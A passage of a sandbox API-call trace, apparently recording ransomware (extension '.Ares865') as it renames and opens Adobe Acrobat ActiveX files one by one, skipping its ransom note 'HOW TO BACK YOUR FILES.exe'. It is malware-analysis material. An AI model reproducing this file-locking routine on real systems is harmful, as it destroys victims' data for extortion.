files\\adobe\\acrobat\\activex\\acropdf.sve.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.246] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=312320) returned 1 [0153.247] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.247] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.247] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.265] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.TUR" | out: lpString1="AcroPDF.TUR") returned="AcroPDF.TUR" [0153.266] lstrlenW (lpString="AcroPDF.TUR") returned 11 [0153.266] lstrlenW (lpString="Ares865") returned 7 [0153.266] lstrcmpiW (lpString1="PDF.TUR", lpString2="Ares865") returned 1 [0153.266] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.TUR.Ares865") returned 77 [0153.266] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.TUR" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.tur"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.TUR.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.tur.ares865"), dwFlags=0x1) returned 1 [0153.268] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.TUR.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.tur.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.268] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=312320) returned 1 [0153.268] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.268] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.268] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.286] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.UKR" | out: lpString1="AcroPDF.UKR") returned="AcroPDF.UKR" [0153.286] lstrlenW (lpString="AcroPDF.UKR") returned 11 [0153.286] lstrlenW (lpString="Ares865") returned 7 [0153.286] lstrcmpiW (lpString1="PDF.UKR", lpString2="Ares865") returned 1 [0153.287] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.UKR.Ares865") returned 77 [0153.287] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.UKR" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.ukr"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.UKR.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.ukr.ares865"), dwFlags=0x1) returned 1 [0153.290] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.UKR.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.ukr.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.290] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=312320) returned 1 [0153.290] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.290] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.290] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.309] lstrcpyW (in: lpString1=0x2cce474, lpString2="PDFShell.CAT.Ares865" | out: lpString1="PDFShell.CAT.Ares865") returned="PDFShell.CAT.Ares865" [0153.309] lstrlenW (lpString="PDFShell.CAT.Ares865") returned 20 [0153.309] lstrlenW (lpString="Ares865") returned 7 [0153.309] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0153.309] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8058e120, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PDFShell.CHS", cAlternateFileName="")) returned 1 [0153.309] lstrcmpiW (lpString1="PDFShell.CHS", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0153.309] lstrcmpiW (lpString1="PDFShell.CHS", lpString2="aoldtz.exe") returned 1 [0153.309] lstrcpyW (in: lpString1=0x2cce474, lpString2="PDFShell.CHS" | out: lpString1="PDFShell.CHS") returned="PDFShell.CHS" [0153.309] lstrlenW (lpString="PDFShell.CHS") returned 12 [0153.309] lstrlenW (lpString="Ares865") returned 7 [0153.309] lstrcmpiW (lpString1="ell.CHS", lpString2="Ares865") returned 1 [0153.309] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHS.Ares865") returned 78 [0153.309] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHS" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.chs"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHS.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.chs.ares865"), dwFlags=0x1) returned 1 [0153.312] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHS.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.chs.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.312] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=300032) returned 1 [0153.312] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.313] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.313] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.330] lstrcpyW (in: lpString1=0x2cce474, lpString2="PDFShell.CHT" | out: lpString1="PDFShell.CHT") returned="PDFShell.CHT" [0153.330] lstrlenW (lpString="PDFShell.CHT") returned 12 [0153.330] lstrlenW (lpString="Ares865") returned 7 [0153.330] lstrcmpiW (lpString1="ell.CHT", lpString2="Ares865") returned 1 [0153.331] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHT.Ares865") returned 78 [0153.331] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHT" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.cht"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHT.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.cht.ares865"), dwFlags=0x1) returned 1 [0153.333] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CHT.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.cht.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.333] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=300032) returned 1 [0153.333] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.333] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.333] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.362] lstrcpyW (in: lpString1=0x2cce474, lpString2="PDFShell.CZE" | out: lpString1="PDFShell.CZE") returned="PDFShell.CZE" [0153.362] lstrlenW (lpString="PDFShell.CZE") returned 12 [0153.362] lstrlenW (lpString="Ares865") returned 7 [0153.362] lstrcmpiW (lpString1="ell.CZE", lpString2="Ares865") returned 1 [0153.362] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CZE.Ares865") returned 78 [0153.362] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CZE" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.cze"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CZE.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.cze.ares865"), dwFlags=0x1) returned 1 [0153.365] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CZE.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.cze.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.365] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=300544) returned 1 [0153.365] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.366] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.366] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.386] lstrcpyW (in: lpString1=0x2cce474, lpString2="PDFShell.DAN" | out: lpString1="PDFShell.DAN") returned="PDFShell.DAN" [0153.386] lstrlenW (lpString="PDFShell.DAN") returned 12 [0153.386] lstrlenW (lpString="Ares865") returned 7 [0153.386] lstrcmpiW (lpString1="ell.DAN", lpString2="Ares865") returned 1 [0153.386] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DAN.Ares865") returned 78 [0153.386] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DAN" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.dan"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DAN.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.dan.ares865"), dwFlags=0x1) returned 1 [0153.388] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DAN.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.dan.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.388] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=300544) returned 1 [0153.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.389] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.389] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.406] lstrcpyW (in: lpString1=0x2cce474, lpString2="PDFShell.DEU" | out: lpString1="PDFShell.DEU") returned="PDFShell.DEU" [0153.406] lstrlenW (lpString="PDFShell.DEU") returned 12 [0153.406] lstrlenW (lpString="Ares865") returned 7 [0153.406] lstrcmpiW (lpString1="ell.DEU", lpString2="Ares865") returned 1 [0153.406] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DEU.Ares865") returned 78 [0153.406] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DEU" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.deu"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DEU.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.deu.ares865"), dwFlags=0x1) returned 1 [0153.417] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.DEU.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.deu.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.417] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=301056) returned 1 [0153.417] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.417] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.417] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.436] lstrcpyW (in: lpString1=0x2cce474, lpString2="pdfshell.dll" | out: lpString1="pdfshell.dll") returned="pdfshell.dll" [0153.436] lstrlenW (lpString="pdfshell.dll") returned 12 [0153.436] lstrlenW (lpString="Ares865") returned 7 [0153.436] lstrcmpiW (lpString1="ell.dll", lpString2="Ares865") returned 1 [0153.436] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\pdfshell.dll.Ares865") returned 78 [0153.437] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\pdfshell.dll" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\pdfshell.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.dll.ares865"), dwFlags=0x1) returned 1 [0153.439] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\pdfshell.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.439] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=390552) returned 1 [0153.439] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.439] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.439] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.461] lstrcpyW (in: lpString1=0x2cce474, lpString2="PDFShell.ESP" | out: lpString1="PDFShell.ESP") returned="PDFShell.ESP" [0153.461] lstrlenW (lpString="PDFShell.ESP") returned 12 [0153.461] lstrlenW (lpString="Ares865") returned 7 [0153.461] lstrcmpiW (lpString1="ell.ESP", lpString2="Ares865") returned 1 [0153.461] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ESP.Ares865") returned 78 [0153.461] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ESP" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.esp"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ESP.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.esp.ares865"), dwFlags=0x1) returned 1 [0153.463] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ESP.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.esp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.464] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=301056) returned 1 [0153.464] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.464] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.464] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.482] lstrcpyW (in: lpString1=0x2cce474, lpString2="PDFShell.EUQ" | out: lpString1="PDFShell.EUQ") returned="PDFShell.EUQ" [0153.482] lstrlenW (lpString="PDFShell.EUQ") returned 12 [0153.482] lstrlenW (lpString="Ares865") returned 7 [0153.482] lstrcmpiW (lpString1="ell.EUQ", lpString2="Ares865") returned 1 [0153.482] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.EUQ.Ares865") returned 78 [0153.482] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.EUQ" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.euq"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.EUQ.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.euq.ares865"), dwFlags=0x1) returned 1 [0153.484] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.EUQ.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.euq.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.484] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=300544) returned 1 [0153.484] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.484] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.484] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.501] lstrcpyW (in: lpString1=0x2cce474, lpString2="PDFShell.FRA" | out: lpString1="PDFShell.FRA") returned="PDFShell.FRA" [0153.502] lstrlenW (lpString="PDFShell.FRA") returned 12 [0153.502] lstrlenW (lpString="Ares865") returned 7 [0153.502] lstrcmpiW (lpString1="ell.FRA", lpString2="Ares865") returned 1 [0153.502] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.FRA.Ares865") returned 78 [0153.502] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.FRA" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.fra"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.FRA.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.fra.ares865"), dwFlags=0x1) returned 1 [0153.504] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.FRA.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.fra.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.504] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=301056) returned 1 [0153.504] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.504] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.504] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.533] lstrcpyW (in: lpString1=0x2cce474, lpString2="PDFShell.HRV" | out: lpString1="PDFShell.HRV") returned="PDFShell.HRV" [0153.533] lstrlenW (lpString="PDFShell.HRV") returned 12 [0153.533] lstrlenW (lpString="Ares865") returned 7 [0153.533] lstrcmpiW (lpString1="ell.HRV", lpString2="Ares865") returned 1 [0153.533] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HRV.Ares865") returned 78 [0153.533] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HRV" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.hrv"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HRV.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.hrv.ares865"), dwFlags=0x1) returned 1 [0153.535] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HRV.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.hrv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.535] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=300544) returned 1 [0153.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.567] lstrcpyW (in: lpString1=0x2cce474, lpString2="PDFShell.HUN" | out: lpString1="PDFShell.HUN") returned="PDFShell.HUN" [0153.567] lstrlenW (lpString="PDFShell.HUN") returned 12 [0153.567] lstrlenW (lpString="Ares865") returned 7 [0153.567] lstrcmpiW (lpString1="ell.HUN", lpString2="Ares865") returned 1 [0153.567] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HUN.Ares865") returned 78 [0153.567] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HUN" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.hun"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HUN.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.hun.ares865"), dwFlags=0x1) returned 1 [0153.570] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HUN.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.hun.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.570] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=300544) returned 1 [0153.570] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.570] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.571] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.617] lstrcpyW (in: lpString1=0x2cce474, lpString2="PDFShell.ITA" | out: lpString1="PDFShell.ITA") returned="PDFShell.ITA" [0153.617] lstrlenW (lpString="PDFShell.ITA") returned 12 [0153.617] lstrlenW (lpString="Ares865") returned 7 [0153.617] lstrcmpiW (lpString1="ell.ITA", lpString2="Ares865") returned 1 [0153.617] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ITA.Ares865") returned 78 [0153.618] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ITA" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.ita"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ITA.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.ita.ares865"), dwFlags=0x1) returned 1 [0153.623] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ITA.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.ita.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.623] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=301056) returned 1 [0153.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.660] lstrcpyW (in: lpString1=0x2cce474, lpString2="PDFShell.JPN" | out: lpString1="PDFShell.JPN") returned="PDFShell.JPN" [0153.660] lstrlenW (lpString="PDFShell.JPN") returned 12 [0153.660] lstrlenW (lpString="Ares865") returned 7 [0153.660] lstrcmpiW 